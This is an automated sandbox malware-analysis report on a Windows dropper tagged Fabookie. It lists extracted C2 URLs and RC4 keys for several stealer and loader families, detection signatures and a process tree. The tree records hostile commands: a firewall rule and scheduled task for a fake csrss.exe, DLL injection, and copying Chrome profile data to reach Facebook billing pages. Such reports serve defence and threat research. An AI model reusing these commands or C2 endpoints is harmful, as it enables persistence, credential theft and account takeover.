fabookie | 67b1a7835687bf5851cf29539b2d0ce90ab30d373edfcf9ee54237026c67df33

Resubmissions

04/10/2024, 18:01 UTC

241004-wl132axhpm 10

22/04/2024, 20:52 UTC

240422-znvwksgb77 10

27/02/2024, 22:40 UTC

240227-2lykssdc83 10

03/01/2024, 09:53 UTC

240103-lw3dqscehj 10

29/12/2023, 23:48 UTC

231229-3txtxadcb8 10

Analysis

max time kernel
1s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20231215-en
resource tags

arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
submitted
29/12/2023, 23:48 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

078192e792b12a8d9980f364e110155c.exe
Size

8.7MB
MD5

078192e792b12a8d9980f364e110155c
SHA1

89596e27530eeccd6ad9644aa045e8e0499301a1
SHA256

67b1a7835687bf5851cf29539b2d0ce90ab30d373edfcf9ee54237026c67df33
SHA512

72a2f85f8aa87fed3b84641bfc4ecde195588837da52553871b9aa917b26c073fea973d2e521290ac08ef6907a21677ebf7bb7886ddef3996625cc81855c0bbc
SSDEEP

196608:UYE5OOysmxHcbDvsAKhZcIGijUtw+cs3Ax9stqFiRtHTV3hZF:XE5OOSuszcTtwp1s8gRtHT5J

Malware Config

Extracted

Family

smokeloader

Botnet

pub2

Extracted

Family

ffdroider

http://186.2.171.3

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

socelars

http://www.iyiqian.com/

http://www.xxhufdc.top/

http://www.uefhkice.xyz/

http://www.fcektsy.top/

Extracted

Family

smokeloader

Version

2020

http://aucmoney.com/upload/

http://thegymmum.com/upload/

http://atvcampingtrips.com/upload/

http://kuapakualaman.com/upload/

http://renatazarazua.com/upload/

http://nasufmutlu.com/upload/

rc4.i32

1
0x3b22e540

rc4.i32

1
0xa6b397e0

Extracted

Family

raccoon

Version

1.7.3

Botnet

92be0387873e54dd629b9bfa972c3a9a88e6726c

Attributes

url4cnc
https://t.me/gishsunsetman

rc4.plain

1
$Z2s`ten\@bE9vzR

rc4.plain

1
8d4a316f90ccdb374cc9af27ab8932af

Signatures

Detect Fabookie payload 2 IoCs

resource	yara_rule
behavioral2/files/0x00080000000231e0-24.dat	family_fabookie
behavioral2/files/0x00080000000231e0-29.dat	family_fabookie

FFDroider
Stealer targeting social media platform users first seen in April 2022.
stealer ffdroider

FFDroider payload 3 IoCs

resource	yara_rule
behavioral2/memory/3616-128-0x0000000000400000-0x000000000060D000-memory.dmp	family_ffdroider
behavioral2/memory/3616-239-0x0000000000400000-0x000000000060D000-memory.dmp	family_ffdroider
behavioral2/memory/3616-1986-0x0000000000400000-0x000000000060D000-memory.dmp	family_ffdroider

Fabookie
Fabookie is facebook account info stealer.
spyware stealer fabookie
Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba payload 9 IoCs

resource	yara_rule
behavioral2/memory/452-189-0x0000000005240000-0x0000000005B66000-memory.dmp	family_glupteba
behavioral2/memory/452-192-0x0000000000400000-0x000000000309C000-memory.dmp	family_glupteba
behavioral2/memory/452-198-0x0000000000400000-0x000000000309C000-memory.dmp	family_glupteba
behavioral2/memory/452-202-0x0000000005240000-0x0000000005B66000-memory.dmp	family_glupteba
behavioral2/memory/5320-240-0x0000000000400000-0x000000000309C000-memory.dmp	family_glupteba
behavioral2/memory/5320-272-0x0000000000400000-0x000000000309C000-memory.dmp	family_glupteba
behavioral2/memory/1376-1421-0x0000000000400000-0x000000000309C000-memory.dmp	family_glupteba
behavioral2/memory/1376-1441-0x0000000000400000-0x000000000309C000-memory.dmp	family_glupteba
behavioral2/memory/1376-1998-0x0000000000400000-0x000000000309C000-memory.dmp	family_glupteba

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
loader privateloader

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3748	4968	rUNdlL32.eXe	103

Raccoon
Raccoon is an infostealer written in C++ and first seen in 2019.
stealer raccoon

Raccoon Stealer V1 payload 4 IoCs

resource	yara_rule
behavioral2/memory/6644-1347-0x0000000000400000-0x0000000000495000-memory.dmp	family_raccoon_v1
behavioral2/memory/6644-1348-0x0000000000400000-0x0000000000495000-memory.dmp	family_raccoon_v1
behavioral2/memory/6644-1352-0x0000000000400000-0x0000000000495000-memory.dmp	family_raccoon_v1
behavioral2/memory/6644-1350-0x0000000000400000-0x0000000000495000-memory.dmp	family_raccoon_v1

RisePro
RisePro stealer is an infostealer distributed by PrivateLoader.
stealer risepro
SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Socelars payload 2 IoCs

resource	yara_rule
behavioral2/files/0x00060000000231e7-42.dat	family_socelars
behavioral2/files/0x00060000000231e7-50.dat	family_socelars

Nirsoft 3 IoCs

resource	yara_rule
behavioral2/memory/3348-181-0x0000000000400000-0x000000000045B000-memory.dmp	Nirsoft
behavioral2/memory/5216-235-0x0000000000400000-0x0000000000422000-memory.dmp	Nirsoft
behavioral2/memory/5216-230-0x0000000000400000-0x0000000000422000-memory.dmp	Nirsoft

Modifies Windows Firewall 1 TTPs 1 IoCs

evasion

Windows Service

T1543.003

pid	Process
5700	netsh.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Control Panel\International\Geo\Nation	078192e792b12a8d9980f364e110155c.exe

Executes dropped EXE 2 IoCs

pid	Process
3068	Files.exe
1196	KRSetp.exe

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/3348-181-0x0000000000400000-0x000000000045B000-memory.dmp	upx
behavioral2/memory/3348-179-0x0000000000400000-0x000000000045B000-memory.dmp	upx
behavioral2/memory/5216-235-0x0000000000400000-0x0000000000422000-memory.dmp	upx
behavioral2/memory/5216-230-0x0000000000400000-0x0000000000422000-memory.dmp	upx

VMProtect packed file 4 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

resource	yara_rule
behavioral2/memory/3616-128-0x0000000000400000-0x000000000060D000-memory.dmp	vmprotect
behavioral2/memory/3616-127-0x0000000000400000-0x000000000060D000-memory.dmp	vmprotect
behavioral2/memory/3616-239-0x0000000000400000-0x000000000060D000-memory.dmp	vmprotect
behavioral2/memory/3616-1986-0x0000000000400000-0x000000000060D000-memory.dmp	vmprotect

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.ex"	Files.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 4 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
9	ip-api.com
11	ipinfo.io
13	ipinfo.io
21	ipinfo.io

Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 2 IoCs

pid	pid_target	Process	procid_target
1608	3372	WerFault.exe	110
5800	2340	WerFault.exe	96

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
3228	schtasks.exe

GoLang User-Agent 1 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

description	flow	ioc
HTTP User-Agent header	87	Go-http-client/1.1

Kills process with taskkill 1 IoCs

evasion

pid	Process
3480	taskkill.exe

Suspicious use of WriteProcessMemory 5 IoCs

description	pid	Process	procid_target
PID 712 wrote to memory of 3068	712	078192e792b12a8d9980f364e110155c.exe	91
PID 712 wrote to memory of 3068	712	078192e792b12a8d9980f364e110155c.exe	91
PID 712 wrote to memory of 3068	712	078192e792b12a8d9980f364e110155c.exe	91
PID 712 wrote to memory of 1196	712	078192e792b12a8d9980f364e110155c.exe	94
PID 712 wrote to memory of 1196	712	078192e792b12a8d9980f364e110155c.exe	94

C:\Users\Admin\AppData\Local\Temp\078192e792b12a8d9980f364e110155c.exe
"C:\Users\Admin\AppData\Local\Temp\078192e792b12a8d9980f364e110155c.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:712
- C:\Users\Admin\AppData\Local\Temp\Files.exe
  "C:\Users\Admin\AppData\Local\Temp\Files.exe"
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  PID:3068
- - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
    3⤵
    PID:3348
- - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
    3⤵
    PID:5216
- C:\Users\Admin\AppData\Local\Temp\KRSetp.exe
  "C:\Users\Admin\AppData\Local\Temp\KRSetp.exe"
  2⤵
  - Executes dropped EXE
  PID:1196
- C:\Users\Admin\AppData\Local\Temp\Install_Files.exe
  "C:\Users\Admin\AppData\Local\Temp\Install_Files.exe"
  2⤵
  PID:2900
- C:\Users\Admin\AppData\Local\Temp\pub2.exe
  "C:\Users\Admin\AppData\Local\Temp\pub2.exe"
  2⤵
  PID:2340
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2340 -s 368
    3⤵
    - Program crash
    PID:5800
- C:\Users\Admin\AppData\Local\Temp\Complete.exe
  "C:\Users\Admin\AppData\Local\Temp\Complete.exe"
  2⤵
  PID:1580
- C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe
  "C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe"
  2⤵
  PID:3616
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1rPS67
  2⤵
  PID:2432
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x108,0xe0,0xe4,0xd8,0xdc,0x7ff9592046f8,0x7ff959204708,0x7ff959204718
    3⤵
    PID:3400
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2112,16949055657723518057,2015679127949557066,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2788 /prefetch:8
    3⤵
    PID:2112
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2112,16949055657723518057,2015679127949557066,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 /prefetch:3
    3⤵
    PID:3060
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,16949055657723518057,2015679127949557066,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3316 /prefetch:1
    3⤵
    PID:3864
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,16949055657723518057,2015679127949557066,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:1
    3⤵
    PID:3256
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,16949055657723518057,2015679127949557066,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2124 /prefetch:2
    3⤵
    PID:2036
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2112,16949055657723518057,2015679127949557066,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5220 /prefetch:8
    3⤵
    PID:5516
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2112,16949055657723518057,2015679127949557066,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5220 /prefetch:8
    3⤵
    PID:5500
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,16949055657723518057,2015679127949557066,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4620 /prefetch:1
    3⤵
    PID:5596
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,16949055657723518057,2015679127949557066,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5324 /prefetch:1
    3⤵
    PID:5588
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,16949055657723518057,2015679127949557066,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5512 /prefetch:1
    3⤵
    PID:6128
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,16949055657723518057,2015679127949557066,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4692 /prefetch:1
    3⤵
    PID:6120
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,16949055657723518057,2015679127949557066,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3036 /prefetch:2
    3⤵
    PID:4816
- C:\Users\Admin\AppData\Local\Temp\jamesdirect.exe
  "C:\Users\Admin\AppData\Local\Temp\jamesdirect.exe"
  2⤵
  PID:1648
- - C:\Users\Admin\AppData\Local\Temp\jamesdirect.exe
    C:\Users\Admin\AppData\Local\Temp\jamesdirect.exe
    3⤵
    PID:6644
- - C:\Users\Admin\AppData\Local\Temp\jamesdirect.exe
    C:\Users\Admin\AppData\Local\Temp\jamesdirect.exe
    3⤵
    PID:6636
- - C:\Users\Admin\AppData\Local\Temp\jamesdirect.exe
    C:\Users\Admin\AppData\Local\Temp\jamesdirect.exe
    3⤵
    PID:6628
- C:\Users\Admin\AppData\Local\Temp\Info.exe
  "C:\Users\Admin\AppData\Local\Temp\Info.exe"
  2⤵
  PID:452
- - C:\Users\Admin\AppData\Local\Temp\Info.exe
    "C:\Users\Admin\AppData\Local\Temp\Info.exe"
    3⤵
    PID:5320
  - - C:\Windows\system32\cmd.exe
      C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
      4⤵
      PID:5916
  - - C:\Windows\rss\csrss.exe
      C:\Windows\rss\csrss.exe /94-94
      4⤵
      PID:1376
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        5⤵
        Creates scheduled task(s)
        
        PID:3228
    - - C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
        5⤵
        
        PID:2824
- C:\Users\Admin\AppData\Local\Temp\Folder.exe
  "C:\Users\Admin\AppData\Local\Temp\Folder.exe"
  2⤵
  PID:1164
- C:\Users\Admin\AppData\Local\Temp\Install.exe
  "C:\Users\Admin\AppData\Local\Temp\Install.exe"
  2⤵
  PID:2316
- - C:\Windows\SysWOW64\cmd.exe
    cmd.exe /c taskkill /f /im chrome.exe
    3⤵
    PID:5168
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im chrome.exe
      4⤵
      Kills process with taskkill
      PID:3480
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\" /s /e /y
    3⤵
    PID:1324
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/
    3⤵
    PID:5864
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2884 --field-trial-handle=1904,i,12325366204935465877,5974903988307335944,131072 /prefetch:1
      4⤵
      PID:5992
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2876 --field-trial-handle=1904,i,12325366204935465877,5974903988307335944,131072 /prefetch:1
      4⤵
      PID:1764
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=2216 --field-trial-handle=1904,i,12325366204935465877,5974903988307335944,131072 /prefetch:8
      4⤵
      PID:2796
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=2144 --field-trial-handle=1904,i,12325366204935465877,5974903988307335944,131072 /prefetch:8
      4⤵
      PID:2132
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1684 --field-trial-handle=1904,i,12325366204935465877,5974903988307335944,131072 /prefetch:2
      4⤵
      PID:4784
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3528 --field-trial-handle=1904,i,12325366204935465877,5974903988307335944,131072 /prefetch:1
      4⤵
      PID:1412
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3344 --field-trial-handle=1904,i,12325366204935465877,5974903988307335944,131072 /prefetch:1
      4⤵
      PID:5952
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=4948 --field-trial-handle=1904,i,12325366204935465877,5974903988307335944,131072 /prefetch:1
      4⤵
      PID:6352
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=3584 --field-trial-handle=1904,i,12325366204935465877,5974903988307335944,131072 /prefetch:8
      4⤵
      PID:6096
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=4092 --field-trial-handle=1904,i,12325366204935465877,5974903988307335944,131072 /prefetch:8
      4⤵
      PID:6052
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2672 --field-trial-handle=1904,i,12325366204935465877,5974903988307335944,131072 /prefetch:2
      4⤵
      PID:6856

C:\Users\Admin\AppData\Local\Temp\Folder.exe
"C:\Users\Admin\AppData\Local\Temp\Folder.exe" -a
1⤵
PID:1116

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1548

C:\Windows\SysWOW64\rundll32.exe
rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
1⤵
PID:3372
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 3372 -s 604
  2⤵
  - Program crash
  PID:1608

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:684

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 3372 -ip 3372
1⤵
PID:2992

C:\Windows\system32\rUNdlL32.eXe
rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
1⤵
- Process spawned unexpected child process
PID:3748

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 2340 -ip 2340
1⤵
PID:5768

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
1⤵
- Modifies Windows Firewall
PID:5700

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ff95b8b9758,0x7ff95b8b9768,0x7ff95b8b9778
1⤵
PID:5892

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:1804

Network

DNS

19.177.190.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

19.177.190.20.in-addr.arpa

IN PTR

Response
DNS

158.240.127.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

158.240.127.40.in-addr.arpa

IN PTR

Response
DNS

ip-api.com

Remote address:

8.8.8.8:53

Request

ip-api.com

IN A

Response

ip-api.com

IN A

208.95.112.1
DNS

ip-api.com

Remote address:

8.8.8.8:53

Request

ip-api.com

IN A
DNS

www.listincode.com

Remote address:

8.8.8.8:53

Request

www.listincode.com

IN A

Response

www.listincode.com

IN A

199.59.243.225
DNS

ipinfo.io

Remote address:

8.8.8.8:53

Request

ipinfo.io

IN A

Response

ipinfo.io

IN A

34.117.186.192
DNS

95.221.229.192.in-addr.arpa

Remote address:

8.8.8.8:53

Request

95.221.229.192.in-addr.arpa

IN PTR

Response
DNS

95.221.229.192.in-addr.arpa

Remote address:

8.8.8.8:53

Request

95.221.229.192.in-addr.arpa

IN PTR
DNS

95.221.229.192.in-addr.arpa

Remote address:

8.8.8.8:53

Request

95.221.229.192.in-addr.arpa

IN PTR
DNS

192.186.117.34.in-addr.arpa

Remote address:

8.8.8.8:53

Request

192.186.117.34.in-addr.arpa

IN PTR

Response

192.186.117.34.in-addr.arpa

IN PTR

